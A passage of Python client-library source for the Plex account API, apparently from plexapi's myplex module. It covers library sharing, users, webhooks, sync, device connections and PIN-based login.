headers = {'Content-Type': 'application/json'}
# Determine whether user has access to the shared server.
user_servers = [s for s in user.servers if s.machineIdentifier == machineId]
if user_servers and sectionIds:
serverId = user_servers[0].id
params = {'server_id': machineId, 'shared_server': {'library_section_ids': sectionIds}}
url = self.FRIENDSERVERS.format(machineId=machineId, serverId=serverId)
else:
params = {'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_id': user.id}}
url = self.FRIENDINVITE.format(machineId=machineId)
# Remove share sections, add shares to user without shares, or update shares
if not user_servers or sectionIds:
if removeSections is True:
response_servers = self.query(url, self._session.delete, json=params, headers=headers)
elif 'invited_id' in params.get('shared_server', ''):
response_servers = self.query(url, self._session.post, json=params, headers=headers)
else:
response_servers = self.query(url, self._session.put, json=params, headers=headers)
else:
log.warning('A section name or LibrarySection object is required to change library sections')
# Update friend filters
url = self.FRIENDUPDATE.format(userId=user.id)
params = {}
if isinstance(allowSync, bool):
params['allowSync'] = '1' if allowSync else '0'
if isinstance(allowCameraUpload, bool):
params['allowCameraUpload'] = '1' if allowCameraUpload else '0'
if isinstance(allowChannels, bool):
params['allowChannels'] = '1' if allowChannels else '0'
if isinstance(filterMovies, dict):
params['filterMovies'] = self._filterDictToStr(filterMovies or {})
if isinstance(filterTelevision, dict):
params['filterTelevision'] = self._filterDictToStr(filterTelevision or {})
if isinstance(filterMusic, dict):
params['filterMusic'] = self._filterDictToStr(filterMusic or {})
if params:
url += utils.joinArgs(params)
response_filters = self.query(url, self._session.put)
return response_servers, response_filters
def user(self, username):
""" Returns the :class:`~plexapi.myplex.MyPlexUser` that matches the email or username specified.
Parameters:
username (str): Username, email or id of the user to return.
"""
username = str(username)
for user in self.users():
# Home users don't have email, username etc.
if username.lower() == user.title.lower():
return user
elif (user.username and user.email and user.id and username.lower() in
(user.username.lower(), user.email.lower(), str(user.id))):
return user
raise NotFound('Unable to find user %s' % username)
def users(self):
""" Returns a list of all :class:`~plexapi.myplex.MyPlexUser` objects connected to your account.
This includes both friends and pending invites. You can reference the user.friend to
distinguish between the two.
"""
friends = [MyPlexUser(self, elem) for elem in self.query(MyPlexUser.key)]
requested = [MyPlexUser(self, elem, self.REQUESTED) for elem in self.query(self.REQUESTED)]
return friends + requested
def _getSectionIds(self, server, sections):
""" Converts a list of section objects or names to sectionIds needed for library sharing. """
if not sections: return []
# Get a list of all section ids for looking up each section.
allSectionIds = {}
machineIdentifier = server.machineIdentifier if isinstance(server, PlexServer) else server
url = self.PLEXSERVERS.replace('{machineId}', machineIdentifier)
data = self.query(url, self._session.get)
for elem in data[0]:
_id = utils.cast(int, elem.attrib.get('id'))
_key = utils.cast(int, elem.attrib.get('key'))
_title = elem.attrib.get('title', '').lower()
allSectionIds[_id] = _id
allSectionIds[_key] = _id
allSectionIds[_title] = _id
log.debug(allSectionIds)
# Convert passed in section items to section ids from above lookup
sectionIds = []
for section in sections:
sectionKey = section.key if isinstance(section, LibrarySection) else section.lower()
sectionIds.append(allSectionIds[sectionKey])
return sectionIds
def _filterDictToStr(self, filterDict):
""" Converts friend filters to a string representation for transport. """
values = []
for key, vals in filterDict.items():
if key not in ('contentRating', 'label'):
raise BadRequest('Unknown filter key: %s' % key)
values.append('%s=%s' % (key, '%2C'.join(vals)))
return '|'.join(values)
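# e.g. {'contentRating': ['G', 'PG'], 'label': ['foo']} -> 'contentRating=G%2CPG|label=foo'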
def addWebhook(self, url):
# copy _webhooks and append url
urls = self._webhooks[:] + [url]
return self.setWebhooks(urls)
def deleteWebhook(self, url):
urls = copy.copy(self._webhooks)
if url not in urls:
raise BadRequest('Webhook does not exist: %s' % url)
urls.remove(url)
return self.setWebhooks(urls)
def setWebhooks(self, urls):
""" Replaces the account webhooks with the given list of URLs. """
log.info('Setting webhooks: %s' % urls)
data = {'urls[]': urls} if len(urls) else {'urls': ''}
data = self.query(self.WEBHOOKS, self._session.post, data=data)
self._webhooks = self.listAttrs(data, 'url', etag='webhook')
return self._webhooks
def webhooks(self):
""" Returns the list of webhook URLs configured for this account. """
data = self.query(self.WEBHOOKS)
self._webhooks = self.listAttrs(data, 'url', etag='webhook')
return self._webhooks
def optOut(self, playback=None, library=None):
""" Opt in or out of sharing stuff with plex.
See: https://www.plex.tv/about/privacy-legal/
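Example (illustrative; assumes `account` is a signed-in :class:`~plexapi.myplex.MyPlexAccount`):
account.optOut(playback=True, library=False)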
"""
params = {}
if playback is not None:
params['optOutPlayback'] = int(playback)
if library is not None:
params['optOutLibraryStats'] = int(library)
url = 'https://plex.tv/api/v2/user/privacy'
return self.query(url, method=self._session.put, data=params)
def syncItems(self, client=None, clientId=None):
""" Returns an instance of :class:`~plexapi.sync.SyncList` for specified client.
Parameters:
client (:class:`~plexapi.myplex.MyPlexDevice`): a client to query SyncItems for.
clientId (str): an identifier of a client to query SyncItems for.
If both `client` and `clientId` are provided, the client is preferred.
If neither `client` nor `clientId` is provided, the clientId is set to the current client's identifier.
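Example (illustrative; 'abc123' is a hypothetical client identifier):
synclist = account.syncItems(clientId='abc123')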
"""
if client:
clientId = client.clientIdentifier
elif clientId is None:
clientId = X_PLEX_IDENTIFIER
data = self.query(SyncList.key.format(clientId=clientId))
return SyncList(self, data)
def sync(self, sync_item, client=None, clientId=None):
""" Adds specified sync item for the client. It's always easier to use methods defined directly in the media
objects, e.g. :func:`~plexapi.video.Video.sync`, :func:`~plexapi.audio.Audio.sync`.
Parameters:
client (:class:`~plexapi.myplex.MyPlexDevice`): a client for which you need to add SyncItem to.
clientId (str): an identifier of a client for which you need to add SyncItem to.
sync_item (:class:`~plexapi.sync.SyncItem`): prepared SyncItem object with all fields set.
If both `client` and `clientId` are provided, the client is preferred.
If neither `client` nor `clientId` is provided, the clientId is set to the current client's identifier.
Returns:
:class:`~plexapi.sync.SyncItem`: an instance of created syncItem.
Raises:
:exc:`~plexapi.exceptions.BadRequest`: When a client with the provided clientId wasn't found.
:exc:`~plexapi.exceptions.BadRequest`: When the provided client doesn't provide `sync-target`.
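Example (illustrative; assumes `item` is a prepared :class:`~plexapi.sync.SyncItem`
and 'abc123' is a hypothetical client identifier):
account.sync(item, clientId='abc123')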
"""
if not client and not clientId:
clientId = X_PLEX_IDENTIFIER
if not client:
for device in self.devices():
if device.clientIdentifier == clientId:
client = device
break
if not client:
raise BadRequest('Unable to find client by clientId=%s' % clientId)
if 'sync-target' not in client.provides:
raise BadRequest('Provided client does not provide sync-target')
params = {
'SyncItem[title]': sync_item.title,
'SyncItem[rootTitle]': sync_item.rootTitle,
'SyncItem[metadataType]': sync_item.metadataType,
'SyncItem[machineIdentifier]': sync_item.machineIdentifier,
'SyncItem[contentType]': sync_item.contentType,
'SyncItem[Policy][scope]': sync_item.policy.scope,
'SyncItem[Policy][unwatched]': str(int(sync_item.policy.unwatched)),
'SyncItem[Policy][value]': str(sync_item.policy.value if hasattr(sync_item.policy, 'value') else 0),
'SyncItem[Location][uri]': sync_item.location,
'SyncItem[MediaSettings][audioBoost]': str(sync_item.mediaSettings.audioBoost),
'SyncItem[MediaSettings][maxVideoBitrate]': str(sync_item.mediaSettings.maxVideoBitrate),
'SyncItem[MediaSettings][musicBitrate]': str(sync_item.mediaSettings.musicBitrate),
'SyncItem[MediaSettings][photoQuality]': str(sync_item.mediaSettings.photoQuality),
'SyncItem[MediaSettings][photoResolution]': sync_item.mediaSettings.photoResolution,
'SyncItem[MediaSettings][subtitleSize]': str(sync_item.mediaSettings.subtitleSize),
'SyncItem[MediaSettings][videoQuality]': str(sync_item.mediaSettings.videoQuality),
'SyncItem[MediaSettings][videoResolution]': sync_item.mediaSettings.videoResolution,
}
url = SyncList.key.format(clientId=client.clientIdentifier)
data = self.query(url, method=self._session.post, headers={
'Content-type': 'application/x-www-form-urlencoded',
}, params=params)
return SyncItem(self, data, None, clientIdentifier=client.clientIdentifier)
def claimToken(self):
""" Returns a str, a new "claim-token", which you can use to register your new Plex Server instance to your
account.
See: https://hub.docker.com/r/plexinc/pms-docker/, https://www.plex.tv/claim/
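Example (illustrative; assumes `account` is a signed-in :class:`~plexapi.myplex.MyPlexAccount`):
token = account.claimToken()  # pass the token to a new server, e.g. via the PLEX_CLAIM env var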
"""
response = self._session.get('https://plex.tv/api/claim/token.json', headers=self._headers(), timeout=TIMEOUT)
if response.status_code not in (200, 201, 204): # pragma: no cover
codename = codes.get(response.status_code)[0]
errtext = response.text.replace('\n', ' ')
raise BadRequest('(%s) %s %s; %s' % (response.status_code, codename, response.url, errtext))
return response.json()['token']
def history(self, maxresults=9999999, mindate=None):
""" Get Play History for all library sections on all servers for the owner.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
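Example (illustrative; returns the owner's history for the last 7 days):
from datetime import datetime, timedelta
hist = account.history(mindate=datetime.now() - timedelta(days=7))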
"""
servers = [x for x in self.resources() if x.provides == 'server' and x.owned]
hist = []
for server in servers:
conn = server.connect()
hist.extend(conn.history(maxresults=maxresults, mindate=mindate, accountID=1))
return hist
def videoOnDemand(self):
""" Returns a list of VOD Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.VOD + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def webShows(self):
""" Returns a list of Webshow Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.WEBSHOWS + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def news(self):
""" Returns a list of News Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.NEWS + 'hubs/sections/all', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def podcasts(self):
""" Returns a list of Podcasts Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.PODCASTS + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def tidal(self):
""" Returns a list of tidal Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.MUSIC + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def onlineMediaSources(self):
""" Returns a list of user account Online Media Sources settings :class:`~plexapi.myplex.AccountOptOut`
"""
url = self.OPTOUTS % {'userUUID': self.uuid}
elem = self.query(url)
return self.findItems(elem, cls=AccountOptOut, etag='optOut')
def link(self, pin):
""" Link a device to the account using a pin code.
Parameters:
pin (str): The 4 digit link pin code.
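Example (illustrative; '1234' is a hypothetical pin shown by the device being linked):
account.link('1234')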
"""
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'X-Plex-Product': 'Plex SSO'
}
data = {'code': pin}
self.query(self.LINK, self._session.put, headers=headers, data=data)
class MyPlexUser(PlexObject):
""" This object represents non-signed in users such as friends and linked
accounts. NOTE: This should not be confused with the :class:`~plexapi.myplex.MyPlexAccount`
which is your specific account. The raw xml for the data presented here
can be found at: https://plex.tv/api/users/
Attributes:
TAG (str): 'User'
key (str): 'https://plex.tv/api/users/'
allowCameraUpload (bool): True if this user can upload images.
allowChannels (bool): True if this user has access to channels.
allowSync (bool): True if this user can sync.
email (str): User's email address (user@gmail.com).
filterAll (str): Unknown.
filterMovies (str): Unknown.
filterMusic (str): Unknown.
filterPhotos (str): Unknown.
filterTelevision (str): Unknown.
home (bool): Unknown.
id (int): User's Plex account ID.
protected (bool): Unknown (possibly SSL enabled?).
recommendationsPlaylistId (str): Unknown.
restricted (str): Unknown.
thumb (str): Link to the users avatar.
title (str): Seems to be an alias for username.
username (str): User's username.
servers (list): Servers shared between the account owner and this user.
"""
TAG = 'User'
key = 'https://plex.tv/api/users/'
def _loadData(self, data):
""" Load attribute values from Plex XML response. """
self._data = data
self.friend = self._initpath == self.key
self.allowCameraUpload = utils.cast(bool, data.attrib.get('allowCameraUpload'))
self.allowChannels = utils.cast(bool, data.attrib.get('allowChannels'))
self.allowSync = utils.cast(bool, data.attrib.get('allowSync'))
self.email = data.attrib.get('email')
self.filterAll = data.attrib.get('filterAll')
self.filterMovies = data.attrib.get('filterMovies')
self.filterMusic = data.attrib.get('filterMusic')
self.filterPhotos = data.attrib.get('filterPhotos')
self.filterTelevision = data.attrib.get('filterTelevision')
self.home = utils.cast(bool, data.attrib.get('home'))
self.id = utils.cast(int, data.attrib.get('id'))
self.protected = utils.cast(bool, data.attrib.get('protected'))
self.recommendationsPlaylistId = data.attrib.get('recommendationsPlaylistId')
self.restricted = data.attrib.get('restricted')
self.thumb = data.attrib.get('thumb')
self.title = data.attrib.get('title', '')
self.username = data.attrib.get('username', '')
self.servers = self.findItems(data, MyPlexServerShare)
for server in self.servers:
server.accountID = self.id
def get_token(self, machineIdentifier):
try:
for item in self._server.query(self._server.FRIENDINVITE.format(machineId=machineIdentifier)):
if utils.cast(int, item.attrib.get('userID')) == self.id:
return item.attrib.get('accessToken')
except Exception:
log.exception('Failed to get access token for %s' % self.title)
def server(self, name):
""" Returns the :class:`~plexapi.myplex.MyPlexServerShare` that matches the name specified.
Parameters:
name (str): Name of the server to return.
"""
for server in self.servers:
if name.lower() == server.name.lower():
return server
raise NotFound('Unable to find server %s' % name)
def history(self, maxresults=9999999, mindate=None):
""" Get all Play History for a user in all shared servers.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
hist = []
for server in self.servers:
hist.extend(server.history(maxresults=maxresults, mindate=mindate))
return hist
class Section(PlexObject):
""" This refers to a shared section. The raw xml for the data presented here
can be found at: https://plex.tv/api/servers/{machineId}/shared_servers
Attributes:
TAG (str): section
id (int): The shared section ID
key (int): The shared library section key
shared (bool): If this section is shared with the user
title (str): Title of the section
type (str): movie, tvshow, artist
"""
TAG = 'Section'
def _loadData(self, data):
self._data = data
self.id = utils.cast(int, data.attrib.get('id'))
self.key = utils.cast(int, data.attrib.get('key'))
self.shared = utils.cast(bool, data.attrib.get('shared', '0'))
self.title = data.attrib.get('title')
self.type = data.attrib.get('type')
self.sectionId = self.id # For backwards compatibility
self.sectionKey = self.key # For backwards compatibility
def history(self, maxresults=9999999, mindate=None):
""" Get all Play History for a user for this section in this shared server.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
server = self._server._server.resource(self._server.name).connect()
return server.history(maxresults=maxresults, mindate=mindate,
accountID=self._server.accountID, librarySectionID=self.sectionKey)
class MyPlexServerShare(PlexObject):
""" Represents a single user's server reference. Used for library sharing.
Attributes:
id (int): id for this share
serverId (int): The ID Plex uses for this server.
machineIdentifier (str): The servers machineIdentifier
name (str): The servers name
lastSeenAt (datetime): Last connected to the server?
numLibraries (int): Total number of libraries
allLibraries (bool): True if all libraries are shared with this user.
owned (bool): True if the server is owned by the user.
pending (bool): True if the invite is pending.
"""
TAG = 'Server'
def _loadData(self, data):
""" Load attribute values from Plex XML response. """
self._data = data
self.id = utils.cast(int, data.attrib.get('id'))
self.accountID = utils.cast(int, data.attrib.get('accountID'))
self.serverId = utils.cast(int, data.attrib.get('serverId'))
self.machineIdentifier = data.attrib.get('machineIdentifier')
self.name = data.attrib.get('name')
self.lastSeenAt = utils.toDatetime(data.attrib.get('lastSeenAt'))
self.numLibraries = utils.cast(int, data.attrib.get('numLibraries'))
self.allLibraries = utils.cast(bool, data.attrib.get('allLibraries'))
self.owned = utils.cast(bool, data.attrib.get('owned'))
self.pending = utils.cast(bool, data.attrib.get('pending'))
def section(self, name):
""" Returns the :class:`~plexapi.myplex.Section` that matches the name specified.
Parameters:
name (str): Name of the section to return.
"""
for section in self.sections():
if name.lower() == section.title.lower():
return section
raise NotFound('Unable to find section %s' % name)
def sections(self):
""" Returns a list of all :class:`~plexapi.myplex.Section` objects shared with this user.
"""
url = MyPlexAccount.FRIENDSERVERS.format(machineId=self.machineIdentifier, serverId=self.id)
data = self._server.query(url)
return self.findItems(data, Section, rtag='SharedServer')
def history(self, maxresults=9999999, mindate=None):
""" Get all Play History for a user in this shared server.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
server = self._server.resource(self.name).connect()
return server.history(maxresults=maxresults, mindate=mindate, accountID=self.accountID)
class MyPlexResource(PlexObject):
""" This object represents resources connected to your Plex server that can provide
content such as Plex Media Servers, iPhone or Android clients, etc. The raw xml
for the data presented here can be found at:
https://plex.tv/api/resources?includeHttps=1&includeRelay=1
Attributes:
TAG (str): 'Device'
key (str): 'https://plex.tv/api/resources?includeHttps=1&includeRelay=1'
accessToken (str): This resources accesstoken.
clientIdentifier (str): Unique ID for this resource.
connections (list): List of :class:`~plexapi.myplex.ResourceConnection` objects
for this resource.
createdAt (datetime): Timestamp this resource first connected to your server.
device (str): Best guess on the type of device this is (PS, iPhone, Linux, etc).
home (bool): Unknown
lastSeenAt (datetime): Timestamp this resource last connected.
name (str): Descriptive name of this resource.
owned (bool): True if this resource is one of your own (you logged into it).
platform (str): OS the resource is running (Linux, Windows, Chrome, etc.)
platformVersion (str): Version of the platform.
presence (bool): True if the resource is online
product (str): Plex product (Plex Media Server, Plex for iOS, Plex Web, etc.)
productVersion (str): Version of the product.
provides (str): List of services this resource provides (client, server,
player, pubsub-player, etc.)
synced (bool): Unknown (possibly True if the resource has synced content?)
"""
TAG = 'Device'
key = 'https://plex.tv/api/resources?includeHttps=1&includeRelay=1'
def _loadData(self, data):
self._data = data
self.name = data.attrib.get('name')
self.accessToken = logfilter.add_secret(data.attrib.get('accessToken'))
self.product = data.attrib.get('product')
self.productVersion = data.attrib.get('productVersion')
self.platform = data.attrib.get('platform')
self.platformVersion = data.attrib.get('platformVersion')
self.device = data.attrib.get('device')
self.clientIdentifier = data.attrib.get('clientIdentifier')
self.createdAt = utils.toDatetime(data.attrib.get('createdAt'))
self.lastSeenAt = utils.toDatetime(data.attrib.get('lastSeenAt'))
self.provides = data.attrib.get('provides')
self.owned = utils.cast(bool, data.attrib.get('owned'))
self.home = utils.cast(bool, data.attrib.get('home'))
self.synced = utils.cast(bool, data.attrib.get('synced'))
self.presence = utils.cast(bool, data.attrib.get('presence'))
self.connections = self.findItems(data, ResourceConnection)
self.publicAddressMatches = utils.cast(bool, data.attrib.get('publicAddressMatches'))
# This seems to only be available if it's not your device (e.g. a shared server)
self.httpsRequired = utils.cast(bool, data.attrib.get('httpsRequired'))
self.ownerid = utils.cast(int, data.attrib.get('ownerId', 0))
self.sourceTitle = data.attrib.get('sourceTitle')  # owner's Plex username
def connect(self, ssl=None, timeout=None):
""" Returns a new :class:`~plexapi.server.PlexServer` or :class:`~plexapi.client.PlexClient` object.
Often there is more than one address specified for a server or client.
This function will prioritize local connections before remote or relay and HTTPS before HTTP.
After trying to connect to all available addresses for this resource and
assuming at least one connection was successful, the PlexServer object is built and returned.
Parameters:
ssl (bool, optional): Set True to only connect to HTTPS connections. Set False to
only connect to HTTP connections. Set None (default) to connect to any
HTTP or HTTPS connection.
timeout (int, optional): The timeout in seconds to attempt each connection.
Raises:
:exc:`~plexapi.exceptions.NotFound`: When unable to connect to any addresses for this resource.
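Example (illustrative; assumes a resource named 'myserver' on the account):
plex = account.resource('myserver').connect(ssl=True, timeout=10)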
"""
# Keys in the order we want the connections to be sorted
locations = ['local', 'remote', 'relay']
schemes = ['https', 'http']
connections_dict = {location: {scheme: [] for scheme in schemes} for location in locations}
for connection in self.connections:
# Only check non-local connections unless we own the resource
if self.owned or not connection.local:
location = 'relay' if connection.relay else ('local' if connection.local else 'remote')
connections_dict[location]['http'].append(connection.httpuri)
connections_dict[location]['https'].append(connection.uri)
if ssl is True: schemes.remove('http')
elif ssl is False: schemes.remove('https')
connections = []
for location in locations:
for scheme in schemes:
connections.extend(connections_dict[location][scheme])
# Try connecting to all known resource connections in parallel, but
# only return the first server (in order) that provides a response.
cls = PlexServer if 'server' in self.provides else PlexClient
listargs = [[cls, url, self.accessToken, timeout] for url in connections]
log.debug('Testing %s resource connections..', len(listargs))
results = utils.threaded(_connect, listargs)
return _chooseConnection('Resource', self.name, results)
class ResourceConnection(PlexObject):
""" Represents a Resource Connection object found within the
:class:`~plexapi.myplex.MyPlexResource` objects.
Attributes:
TAG (str): 'Connection'
address (str): Local IP address
httpuri (str): Full local address
local (bool): True if local
port (int): 32400
protocol (str): HTTP or HTTPS
uri (str): External address
"""
TAG = 'Connection'
def _loadData(self, data):
self._data = data
self.protocol = data.attrib.get('protocol')
self.address = data.attrib.get('address')
self.port = utils.cast(int, data.attrib.get('port'))
self.uri = data.attrib.get('uri')
self.local = utils.cast(bool, data.attrib.get('local'))
self.httpuri = 'http://%s:%s' % (self.address, self.port)
self.relay = utils.cast(bool, data.attrib.get('relay'))
class MyPlexDevice(PlexObject):
""" This object represents resources connected to your Plex server that provide
playback ability from your Plex Server, iPhone or Android clients, Plex Web,
this API, etc. The raw xml for the data presented here can be found at:
https://plex.tv/devices.xml
Attributes:
TAG (str): 'Device'
key (str): 'https://plex.tv/devices.xml'
clientIdentifier (str): Unique ID for this resource.
connections (list): List of connection URIs for the device.
device (str): Best guess on the type of device this is (Linux, iPad, AFTB, etc).
id (str): MyPlex ID of the device.
model (str): Model of the device (bueller, Linux, x86_64, etc.)
name (str): Hostname of the device.
platform (str): OS the resource is running (Linux, Windows, Chrome, etc.)
platformVersion (str): Version of the platform.
product (str): Plex product (Plex Media Server, Plex for iOS, Plex Web, etc.)
productVersion (string): Version of the product.
provides (str): List of services this resource provides (client, controller,
sync-target, player, pubsub-player).
publicAddress (str): Public IP address.
screenDensity (str): Unknown
screenResolution (str): Screen resolution (750x1334, 1242x2208, etc.)
token (str): Plex authentication token for the device.
vendor (str): Device vendor (ubuntu, etc).
version (str): Unknown (1, 2, 1.3.3.3148-b38628e, 1.3.15, etc.)
"""
TAG = 'Device'
key = 'https://plex.tv/devices.xml'
def _loadData(self, data):
self._data = data
self.name = data.attrib.get('name')
self.publicAddress = data.attrib.get('publicAddress')
self.product = data.attrib.get('product')
self.productVersion = data.attrib.get('productVersion')
self.platform = data.attrib.get('platform')
self.platformVersion = data.attrib.get('platformVersion')
self.device = data.attrib.get('device')
self.model = data.attrib.get('model')
self.vendor = data.attrib.get('vendor')
self.provides = data.attrib.get('provides')
self.clientIdentifier = data.attrib.get('clientIdentifier')
self.version = data.attrib.get('version')
self.id = data.attrib.get('id')
self.token = logfilter.add_secret(data.attrib.get('token'))
self.screenResolution = data.attrib.get('screenResolution')
self.screenDensity = data.attrib.get('screenDensity')
self.createdAt = utils.toDatetime(data.attrib.get('createdAt'))
self.lastSeenAt = utils.toDatetime(data.attrib.get('lastSeenAt'))
self.connections = self.listAttrs(data, 'uri', etag='Connection')
def connect(self, timeout=None):
""" Returns a new :class:`~plexapi.client.PlexClient` or :class:`~plexapi.server.PlexServer`
Sometimes there is more than one address specified for a server or client.
After trying to connect to all available addresses for this client and assuming
at least one connection was successful, the PlexClient object is built and returned.
Raises:
:exc:`~plexapi.exceptions.NotFound`: When unable to connect to any addresses for this device.
"""
cls = PlexServer if 'server' in self.provides else PlexClient
listargs = [[cls, url, self.token, timeout] for url in self.connections]
log.debug('Testing %s device connections..', len(listargs))
results = utils.threaded(_connect, listargs)
return _chooseConnection('Device', self.name, results)
def delete(self):
""" Remove this device from your account. """
key = 'https://plex.tv/devices/%s.xml' % self.id
self._server.query(key, self._server._session.delete)
def syncItems(self):
""" Returns an instance of :class:`~plexapi.sync.SyncList` for current device.
Raises:
:exc:`~plexapi.exceptions.BadRequest`: when the device doesn't provide `sync-target`.
"""
if 'sync-target' not in self.provides:
raise BadRequest('Requested syncList for a device which does not provide sync-target')
return self._server.syncItems(client=self)
class MyPlexPinLogin(object):
"""
MyPlex PIN login class which supports getting the four character PIN which the user must
enter on https://plex.tv/link to authenticate the client and provide an access token to
create a :class:`~plexapi.myplex.MyPlexAccount` instance.
This helper class supports a polling, threaded and callback approach.
- The polling approach expects the developer to periodically check if the PIN login was
successful using :func:`~plexapi.myplex.MyPlexPinLogin.checkLogin`.
- The threaded approach expects the developer to call
:func:`~plexapi.myplex.MyPlexPinLogin.run` and then at a later time call
:func:`~plexapi.myplex.MyPlexPinLogin.waitForLogin` to wait for and check the result.
- The callback approach is an extension of the threaded approach and expects the developer
to pass the `callback` parameter to the call to :func:`~plexapi.myplex.MyPlexPinLogin.run`.
The callback will be called when the thread waiting for the PIN login to succeed either
finishes or expires. The parameter passed to the callback is the received authentication
token or `None` if the login expired.
Parameters:
session (requests.Session, optional): Use your own session object if you want to
cache the http responses from PMS
requestTimeout (int): timeout in seconds on initial connect to plex.tv (default config.TIMEOUT).
Attributes:
PINS (str): 'https://plex.tv/api/v2/pins'
CHECKPINS (str): 'https://plex.tv/api/v2/pins/{pinid}'
LINK (str): 'https://plex.tv/api/v2/pins/link'
POLLINTERVAL (int): 1
finished (bool): Whether the pin login has finished or not.
expired (bool): Whether the pin login has expired or not.
token (str): Token retrieved through the pin login.
pin (str): Pin to use for the login on https://plex.tv/link.
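Example (illustrative polling/threaded usage; assumes MyPlexAccount is imported):
pinlogin = MyPlexPinLogin()
print('Enter this PIN at https://plex.tv/link: %s' % pinlogin.pin)
pinlogin.run(timeout=120)
pinlogin.waitForLogin()
if pinlogin.token:
account = MyPlexAccount(token=pinlogin.token)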
"""
PINS = 'https://plex.tv/api/v2/pins' # get
CHECKPINS = 'https://plex.tv/api/v2/pins/{pinid}' # get
POLLINTERVAL = 1
def __init__(self, session=None, requestTimeout=None, headers=None):
super(MyPlexPinLogin, self).__init__()
self._session = session or requests.Session()
self._requestTimeout = requestTimeout or TIMEOUT
self.headers = headers
self._loginTimeout = None
self._callback = None
self._thread = None
self._abort = False
self._id = None
self._code = None
self._getCode()
self.finished = False
self.expired = False
self.token = None
@property
def pin(self):
return self._code
def run(self, callback=None, timeout=None):
""" Starts the thread which monitors the PIN login state.
Parameters:
callback (Callable[str]): Callback called with the received authentication token (optional).
timeout (int): Timeout in seconds waiting for the PIN login to succeed (optional).
Raises:
:class:`RuntimeError`: If the thread is already running.
:class:`RuntimeError`: If the PIN login for the current PIN has expired.
"""
if self._thread and not self._abort:
raise RuntimeError('MyPlexPinLogin thread is already running')
if self.expired:
raise RuntimeError('MyPlexPinLogin has expired')
self._loginTimeout = timeout
self._callback = callback
self._abort = False
self.finished = False
self._thread = threading.Thread(target=self._pollLogin, name='plexapi.myplex.MyPlexPinLogin')
self._thread.start()
def waitForLogin(self):
""" Waits for the PIN login to succeed or expire.
Parameters:
callback (Callable[str]): Callback called with the received authentication token (optional).
timeout (int): Timeout in seconds waiting for the PIN login to succeed (optional).
Returns:
`True` if the PIN login succeeded or `False` otherwise.
"""
if not self._thread or self._abort:
return False
self._thread.join()
if self.expired or not self.token:
return False
return True
def stop(self):
""" Stops the thread monitoring the PIN login state. """
if not self._thread or self._abort:
return
self._abort = True
self._thread.join()
def checkLogin(self):
""" Returns `True` if the PIN login has succeeded. """
if self._thread:
return False
try:
return self._checkLogin()
except Exception:
self.expired = True
self.finished = True
return False
def _getCode(self):
url = self.PINS
response = self._query(url, self._session.post)
if not response:
return None
self._id = response.attrib.get('id')
self._code = response.attrib.get('code')
return self._code
def _checkLogin(self):
if not self._id:
return False
if self.token:
return True
url = self.CHECKPINS.format(pinid=self._id)
response = self._query(url)
if not response:
return False
token = response.attrib.get('authToken')
if not token:
return False
self.token = token
self.finished = True
return True
def _pollLogin(self):
try:
start = time.time()
while not self._abort and (not self._loginTimeout or (time.time() - start) < self._loginTimeout):
try:
result = self._checkLogin()
except Exception:
self.expired = True
break
if result:
break
time.sleep(self.POLLINTERVAL)
if self.token and self._callback:
self._callback(self.token)
finally:
self.finished = True
def _headers(self, **kwargs):
""" Returns dict containing base headers for all requests for pin login. """
headers = BASE_HEADERS.copy()
if self.headers:
headers.update(self.headers)
headers.update(kwargs)
return headers
def _query(self, url, method=None, headers=None, **kwargs):
method = method or self._session.get
log.debug('%s %s', method.__name__.upper(), url)
headers = headers or self._headers()
response = method(url, headers=headers, timeout=self._requestTimeout, **kwargs)
if not response.ok: # pragma: no cover
codename = codes.get(response.status_code)[0]
errtext = response.text.replace('\n', ' ')
raise BadRequest('(%s) %s %s; %s' % (response.status_code, codename, response.url, errtext))
data = response.text.encode('utf8')
return ElementTree.fromstring(data) if data.strip() else None
def _connect(cls, url, token, timeout, results, i, job_is_done_event=None):
""" Connects to the specified cls with url and token. Stores the connection
information to results[i] in a threadsafe way.
Arguments:
cls: the class which is responsible for establishing connection, basically it's
:class:`~plexapi.client.PlexClient` or :class:`~plexapi.server.PlexServer`
url (str): url which should be passed as `baseurl` argument to cls.__init__()
token (str): authentication token which should be passed as `token` argument to cls.__init__()
timeout (int): timeout which should be passed as `timeout` argument to cls.__init__()
results (list): pre-filled list for results
i (int): index of current job, should be less than len(results)
job_is_done_event (:class:`~threading.Event`): if X_PLEX_ENABLE_FAST_CONNECT is True then the
event will be set as soon as the connection is established
"""
starttime = time.time()
try:
device = cls(baseurl=url, token=token, timeout=timeout)
runtime = int(time.time() - starttime)
results[i] = (url, token, device, runtime)
if X_PLEX_ENABLE_FAST_CONNECT and job_is_done_event:
job_is_done_event.set()
except Exception as err:
runtime = int(time.time() - starttime)
log.error('%s: %s', url, err)
results[i] = (url, token, None, runtime)
def _chooseConnection(ctype, name, results):
""" Chooses the first (best) connection from the given _connect results. """
# At this point we have a list of result tuples containing (url, token, PlexServer, runtime)
# or (url, token, None, runtime) in the case a connection could not be established.
for url, token, result, runtime in results:
okerr = 'OK' if result else 'ERR'
log.debug('%s connection %s (%ss): %s?X-Plex-Token=%s', ctype, okerr, runtime, url, token)
results = [r[2] for r in results if r and r[2] is not None]
if results:
log.debug('Connecting to %s: %s?X-Plex-Token=%s', ctype, results[0]._baseurl, results[0]._token)
return results[0]
raise NotFound('Unable to connect to %s: %s' % (ctype.lower(), name))
